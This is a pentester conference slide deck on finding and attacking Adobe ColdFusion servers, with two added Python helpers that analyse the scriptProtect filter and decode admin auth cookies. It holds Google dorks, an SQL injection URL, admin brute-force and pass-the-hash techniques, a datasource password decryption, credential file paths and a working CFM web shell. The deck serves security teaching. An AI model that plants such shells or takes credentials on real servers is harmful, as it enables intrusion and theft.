ColdFusion for Pentesters
Chris Gates (Carnal0wnage), Lares Consulting
Whoami
• Chris Gates (CG)
– Twitter: carnal0wnage
– Blog: carnal0wnage.attackresearch.com
– Job: Partner/Principal Security Consultant at Lares
– Affiliations: Co-Founder NoVAHackers, wXf, Attack Research, Metasploit Project
• Previous Talks
– From LOW to PWNED
– Attacking Oracle (via web)
– wXf Web eXploitation Framework
– Open Source Information Gathering
– Attacking Oracle (via TNS)
– Client-Side Attacks
Agenda
• What is ColdFusion
• Who uses ColdFusion
• Finding sites running ColdFusion
• Attacking ColdFusion
– Common vulnerabilities
– Insta-Shell
– Gotta work for it
– Other Stuff
• Post Exploitation
• Defense?
Why This Talk?
• Kept running into ColdFusion on pentests
• Last “pentester” talk on ColdFusion was 2006 at EUSec: http://eusecwest.com/esw06/esw06-davis.pdf
• Chris Eng’s “Deconstructing ColdFusion” renewed my interest:
– https://media.blackhat.com/bh-us-10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
– https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
• People in the ColdFusion world take a high-level view of security and didn’t want to give up the details on f**king ColdFusion up… had to figure it out myself
What Is ColdFusion?
• CFML = ColdFusion Markup Language
• ColdFusion = Adobe’s product that handles CFML pages/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Fronted by Apache, IIS, or JRun
• Not the only product that can handle CFML
– Railo, Mura CMS and Open BlueDragon also support CFML
Who Uses ColdFusion?
• http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf-evangelist-kit.pdf
• http://www.bricecheddarn.com/blog/post.cfm/universities-love-using-coldfusion
Who Uses ColdFusion [Mura CMS]?
• http://www.getmura.com/index.cfm/overview/who-uses-mura/
Finding Sites Running ColdFusion
• inurl:/index.cfm
• Who doesn’t love Google Dorks…
• filetype:cfm "cfapplication name" password
• inurl:login.cfm
• intitle:"Error Occurred" "The error occurred in" filetype:cfm
• intitle:"ColdFusion Administrator Login"
• intitle:"Index of" cfide
• inurl:/CFIDE/componentutils/ (finds misconfigured servers)
• http://www.gotcfm.com/thelist.cfm
• Delicious
ColdFusion Hit List
• ColdFusion 5
• ColdFusion 6
• ColdFusion 7
• ColdFusion 8
• ColdFusion 9
• ColdFusion 10
ColdFusion Scanner
• Metasploit module to find ColdFusion URLs
Attacking ColdFusion
• http://www.cvedetails.com/version-list/53/8739/1/Adobe-Coldfusion.html
• Common Vulnerabilities
– Information Disclosure
– XSS
– SQL Injection
– Admin Interfaces Exposed (more later)
Attacking ColdFusion
• Information Disclosure
• Need to determine Standard vs Enterprise ColdFusion? *
• Just request a .jsp page
– Standard versions don’t do JSP and will tell you so via a 500 error && license exception
– Enterprise supports JSP and will just 404
• * Useful for post exploitation
• Enterprise and Standard responses (screenshots)
• Information Disclosure (screenshots)
Attacking ColdFusion
• XSS
• Generally XSS is boring, but wait until we talk about cookies…
• ColdFusion has scriptProtect, which helps strip out <script> tags
• The blacklist used by scriptProtect: <\s*(object|embed|script|applet|meta)
• Chris Eng’s Deconstructing ColdFusion whitepaper goes into detail.
• XSS (screenshots)
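The following Python model of that blacklist is an added example, not code from the talk or from Adobe; it assumes scriptProtect matches case-insensitively and rewrites the matched tag name to InvalidTag, and sets it beside plain HTML output encoding to show why a five-tag blacklist is not a substitute for encoding.

```python
import html
import re

# Blacklist quoted on the slide. Case-insensitive matching and the
# "InvalidTag" replacement text are assumptions about the product's behaviour.
SCRIPT_PROTECT_RE = re.compile(r"<\s*(object|embed|script|applet|meta)", re.IGNORECASE)
REPLACEMENT = "<InvalidTag"


def script_protect(value: str) -> str:
    """Model of scriptProtect: only the five blacklisted tag names are rewritten."""
    return SCRIPT_PROTECT_RE.sub(REPLACEMENT, value)


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text context: neutralises every '<', whatever the tag."""
    return html.escape(value, quote=True)


def audit(value: str) -> dict:
    """Show what each defence does to one input and whether a raw '<' survives it."""
    filtered = script_protect(value)
    encoded = encode_for_html(value)
    return {
        "blacklist_hit": filtered != value,
        "after_script_protect": filtered,
        "raw_lt_survives_blacklist": "<" in filtered,
        "after_encoding": encoded,
        "raw_lt_survives_encoding": "<" in encoded,
    }


# Constructed sample inputs for the demonstration.
SAMPLES = [
    "<script>alert(1)</script>",     # in the blacklist: tag name rewritten
    "< SCRIPT src=x>",               # whitespace after '<' and upper case still match
    "<img src=x onerror=alert(1)>",  # not in the blacklist: passes through untouched
    "plain text, no markup",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = audit(sample)
        print(f"{sample!r}")
        print(f"  scriptProtect -> {result['after_script_protect']!r} "
              f"(raw '<' survives: {result['raw_lt_survives_blacklist']})")
        print(f"  encodeForHTML -> {result['after_encoding']!r} "
              f"(raw '<' survives: {result['raw_lt_survives_encoding']})")
```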
Attacking ColdFusion
• SQL Injection
• If you see =somenumber, go after it:
<cfquery name="getContent" dataSource="myDataSource">
select title from tblJobs where visible = 1 and id = #url.id#
</cfquery>
• Like most applications, it’s possible to write secure code, but some people don’t.
• Example: http://site.com/links/apply.cfm?id=(@@version)
Attacking ColdFusion
• Insta-Shell
– BlazeDS/AMF External XML Entity Injection (CVE-2009-3960)
– File Upload Vulnerability in CF8 FCKeditor (APSB09-09)
– ‘locale’ Path Traversal Vulnerability (CVE-2010-2861, APSB10-18)
Attacking ColdFusion
• Patching
– ColdFusion requires manual patching: unzip in a folder, overwrite a jar, etc.
– Admin interface doesn’t alert you to available patches
– I’m not a CF admin, but it seems easy to miss one
• Pro Tip
– Determining the version is helpful for insta-shell exploits
– The Metasploit module can tell you by admin interface, or you can just look at /CFIDE/administrator/
– Or you can check the WSDL: /CFIDE/adminapi/base.cfc?wsdl (checked on 7-9)
• Version banners (screenshots)
Attacking ColdFusion
• BlazeDS/AMF External XML Entity Injection
– Advisory PDF: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
• Affects:
– BlazeDS 3.2 and earlier versions
– LiveCycle 9.0, 8.2.1, and 8.0.1
– LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
– Flex Data Services 2.0.1
– ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
• CVE-2009-3960 / APSB10-05
• http://www.metasploit.com/modules/auxiliary/scanner/http/adobe_xml_inject
• BlazeDS/AMF External XML Entity Injection (screenshots)
Attacking ColdFusion
• FCKeditor (APSB09-09)
• ColdFusion 8.01 enabled the ColdFusion FCKeditor connector && FCKeditor vulns == unauthenticated file upload
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
• http://metasploit.com/modules/exploit/windows/http/coldfusion_fckeditor
Attacking ColdFusion
• (related) FCKeditor (CVE-2009-2265) input sanitization issues
• FCKeditor prior to 2.6.4.1
• Can also check the version with a GET request:
/CFIDE/scripts/ajax/FCKeditor/editor/dialog/fck_about.html
Attacking ColdFusion
• “Locale” Directory Traversal
• Full walkthrough here: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
• TL;DR: you can pass the hash
• Modules for Metasploit and Canvas to exploit and get shell.
• Vulnerable Versions:
– ColdFusion MX6 6.1 base patches
– ColdFusion MX7 7,0,0,91690 base patches
– ColdFusion MX8 8,0,1,195765 base patches
– ColdFusion MX8 8,0,1,195765 with Hotfix4
• ColdFusion 9? Immunity reported yes, but Adobe fixed the downloadable version of 9, so maaaaaaybe if it’s an old version of 9.
Attacking ColdFusion
• “Locale” Directory Traversal
• ColdFusion 7 is always vuln, no patch
• Yeah, CF 8 too (has patch)
• Problem with the traversal exploit is you need to know the full path.
• Manageable on Windows…
• Can be anywhere on *nix
– Cue path disclosure vulns
– Directory listings
– Misconfigured componentutils access
• Componentutils (Component cfcexplorer)
– Documentation for functions, includes full paths
Attacking ColdFusion
• Gotta work for it…
• Brute Force RDS Access (if enabled)
– Check if RDS is enabled
– Brute force RDS
• Brute Force Admin Interfaces
– Main login page uses a salt that changes every 60 sec
– Use another login page that also accepts the admin password
• Sets a cookie when you guess the right password
• No account lockouts
• Depending on version, no username required
• No password complexity requirements
• No real logging (web server logging only)
• RDS = Remote Development Services
• “In ColdFusion Studio/Builder/Eclipse, you can connect to and work with the files on any server that has ColdFusion Server installed by using RDS, just as if you were working with files on your own computer.”
• FTP over HTTP (essentially)
• Lots of docs, go read…
Attacking ColdFusion
• Admin Interfaces
• Prior to CF8 only password auth; CF8 introduces usernames
• Easy to tell if it’s just “admin” or other usernames
• /CFIDE/administrator/index.cfm salts the password
• Lots of other pages don’t
– Ex. /CFIDE/componentutils/login.cfm
• Get the password right, CF sets a cookie
• Metasploit Module
• Can do this easily in Burp Suite as well
Your passwords suck
Attacking ColdFusion
• Other Stuff
– Solr
– Interacting with CFCs
– Cookies
• Solr APSB10-04 (Information Disclosure)
– “Vulnerability in Solr could allow access to collections created by the Solr Service to be accessed from any external machine using a specific URL”
– http://IP:8983/solr/data_medialibrary/admin/get-properties.jsp
– http://IP:8983/solr/core0/admin/get-properties.jsp
Attacking ColdFusion
• Interacting with CFCs: http://example.com/foo.cfc?method=mymethod&arga=val1&argb=val2
• This URL will invoke method mymethod on an anonymous instance of component foo.cfc, with arguments arga="val1" and argb="val2"
– ex: /CFIDE/adminapi/administrator.cfc?method=getSalt
• Can only invoke “remote” methods over a web browser
• Default stuff not sexy, custom stuff might have fun stuff.
Attacking ColdFusion
• Cookies
• Normally that XSS pop-up with the session cookie is pretty lame.
• “Supposed” to have a limited lifespan.
• BUT the cfadmin cookie and cfutils cookie are different.
• Let’s see…
• Example Admin Cookie: CFAUTHORIZATION_cfadmin=YWRtaW4NRTM4QUQyMTQ5NDNEQUFEMUQ2NEMxMDJGQUVDMjlERTRBRkU5REEzRA1jZmFkbWlu
• Base64 decodes to:
– admin
– E38AD214943DAAD1D64C102FAEC29DE4AFE9DA3D
– cfadmin
• e38ad214943daad1d64c102faec29de4afe9da3d (sha1) = password1 WTF!!!
• To Recap…
• Got the cfadmin cookie
• No randomness at all in the cookie
• SSL not enabled by default on admin interface
• Cookie base64 decodes to the username and the sha1 hash of the password
• Shown we don’t actually need to crack the hash, can just pass it
• Bad?
• CFAUTHORIZATION_componentutils=cGFzc3dvcmQxDXBhc3N3b3JkMQ1jb21wb25lbnR1dGlscw==
• Base64 decodes to:
– password1
– password1
– componentutils
• OMGWTFBBQ!!!
• But real world? (screenshots)
• From 2009 to 2012…
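An added Python helper (not from the talk) that decodes the two cookie values quoted above from a constructed Cookie header, confirms that the cfadmin credential field is the unsalted SHA-1 of the password, and flags the componentutils cookie as carrying the password in the clear; it assumes the three fields are joined with a carriage return (0x0D), which is what the decoded values show.

```python
import base64
import hashlib
from dataclasses import dataclass

PREFIX = "CFAUTHORIZATION_"
SEPARATOR = "\r"  # the three fields are joined with a carriage return (0x0D)

# Constructed Cookie header built from the two values quoted on the slides.
SAMPLE_COOKIE_HEADER = (
    "CFAUTHORIZATION_cfadmin="
    "YWRtaW4NRTM4QUQyMTQ5NDNEQUFEMUQ2NEMxMDJGQUVDMjlERTRBRkU5REEzRA1jZmFkbWlu; "
    "CFAUTHORIZATION_componentutils="
    "cGFzc3dvcmQxDXBhc3N3b3JkMQ1jb21wb25lbnR1dGlscw=="
)


@dataclass
class CFAuthorization:
    realm: str       # cookie name suffix: cfadmin or componentutils
    user: str        # first decoded field
    credential: str  # second field: SHA-1 hex of the password, or the password itself
    scope: str       # third field: repeats the realm


def parse_cfauthorization(name: str, value: str) -> CFAuthorization:
    """Base64-decode one CFAUTHORIZATION_* cookie into its three fields."""
    if not name.startswith(PREFIX):
        raise ValueError(f"{name} is not a CFAUTHORIZATION cookie")
    raw = base64.b64decode(value).decode("ascii")
    fields = raw.split(SEPARATOR)
    if len(fields) != 3:
        raise ValueError(f"expected 3 CR-separated fields, got {len(fields)}")
    user, credential, scope = fields
    return CFAuthorization(name[len(PREFIX):], user, credential, scope)


def looks_like_sha1_hex(text: str) -> bool:
    """40 hex characters, either case."""
    return len(text) == 40 and all(c in "0123456789abcdefABCDEF" for c in text)


def classify(cookie: CFAuthorization) -> str:
    """'sha1-of-password' for the hashed form, 'plaintext' when the password itself is present."""
    return "sha1-of-password" if looks_like_sha1_hex(cookie.credential) else "plaintext"


def matches_password(cookie: CFAuthorization, candidate: str) -> bool:
    """Does a candidate password account for the credential field? (unsalted SHA-1, hex, any case)"""
    if looks_like_sha1_hex(cookie.credential):
        digest = hashlib.sha1(candidate.encode("utf-8")).hexdigest()
        return digest.lower() == cookie.credential.lower()
    return cookie.credential == candidate


def audit_cookie_header(header: str) -> list:
    """Walk a Cookie: header and report (cookie name, user, credential form) for each CF auth cookie."""
    findings = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if not sep or not name.startswith(PREFIX):
            continue
        cookie = parse_cfauthorization(name, value)
        findings.append((name, cookie.user, classify(cookie)))
    return findings


if __name__ == "__main__":
    for name, user, form in audit_cookie_header(SAMPLE_COOKIE_HEADER):
        print(f"{name}: user={user!r} credential={form}")
    admin = parse_cfauthorization(*SAMPLE_COOKIE_HEADER.split(";")[0].strip().split("=", 1))
    print("cfadmin credential is sha1('password1'):", matches_password(admin, "password1"))
```

Run against a captured header the same way; a "plaintext" finding on a non-SSL admin interface is the exposure the slides are pointing at.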
Post Exploitation
• ColdFusion Privilege Level
• Scheduling tasks
• Executing code
• Decrypting database credentials
• CFM Shells
• ColdFusion (by default) runs as SYSTEM on Windows and NOBODY on *nix
• Obviously, CF on Windows is what you want
• Sites that run other languages but haven't unmapped the ColdFusion variables are awesome too
• Scheduling Tasks
– Once you have access to the admin interface you can schedule a task to download code/executables/bat files/etc.
• Scheduled task configuration (screenshot)
Post Exploitation
• Executing code
– Once you have the code/exe on the box you can create a system probe (that we want to fail) to make the code execute
– Or if you put a cfm/jsp shell on the box, you’re done
• System probe configuration (screenshots)
Post Exploitation
• Decrypting database credentials
• http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html
• Go to DataSource Selection
• Click on DataSource (ex TEST)
• View Source, get value
• Decrypt it:
$ python coldfusiondecrypt.py maJsuHYMay8zpmptC2yibA==
Coldfusion v7 y v8 DataSource password decryptor (c) 2008
Hernan Ochoa ([email protected])
decrypted password: ThisIsAPassword
• If you have file system access, just grab the XML files
– ColdFusion 7: \lib\neo-query.xml, for example c:\CFusionMX7\lib\neo-query.xml
– ColdFusion 8: \lib\neo-datasource.xml, for example c:\coldfusion8\lib\neo-datasource.xml
– ColdFusion 9: \lib\neo-datasource.xml, for example c:\coldfusion9\lib\neo-datasource.xml
Post Exploitation
• CFM Shells
• ColdFusion has several handy CFML tags:
– CFEXECUTE
– CFREGISTRY
– CFFILE
– CFHTTP
• Simple CFM Shell:
<html>
<body>
<cfexecute name="#URL.runme#" arguments="#URL.args#" timeout="20">
</cfexecute>
</body>
</html>
Post Exploitation
• CFM Shells
• It’s common to disable CFEXECUTE*
• CF also runs Java, so:
<cfset runtime = createObject("java", "java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">
• Will give you something like… (screenshot of the dumped properties and environment)
Post Exploitation
• CFM Shells
• Remember Enterprise vs Standard?
– Enterprise runs JSP, so some JSP shells will work too (depends on the shell’s Java version requirements)
• Sky’s the limit!
• Pretty much anything you can code in Java, CF will run for you
• ColdFusion 9 and above support cfscript == javascript for ColdFusion
ColdFusion Stuff To Read
• http://www.petefreitag.com/ (lots of defense/CF hardening info)
• http://www.bennadel.com/blog/
• http://www.raymondcamden.com/
• http://12robots.com/
• Chris Eng’s Deconstructing ColdFusion (slides and WP)
– https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
• Davis’ EUSEC ColdFusion talk
– http://eusecwest.com/esw06/esw06-davis.pdf
– Alt: http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf
Questions?
@carnal0wnage
cgates [] laresconsulting [] com
Chris Gates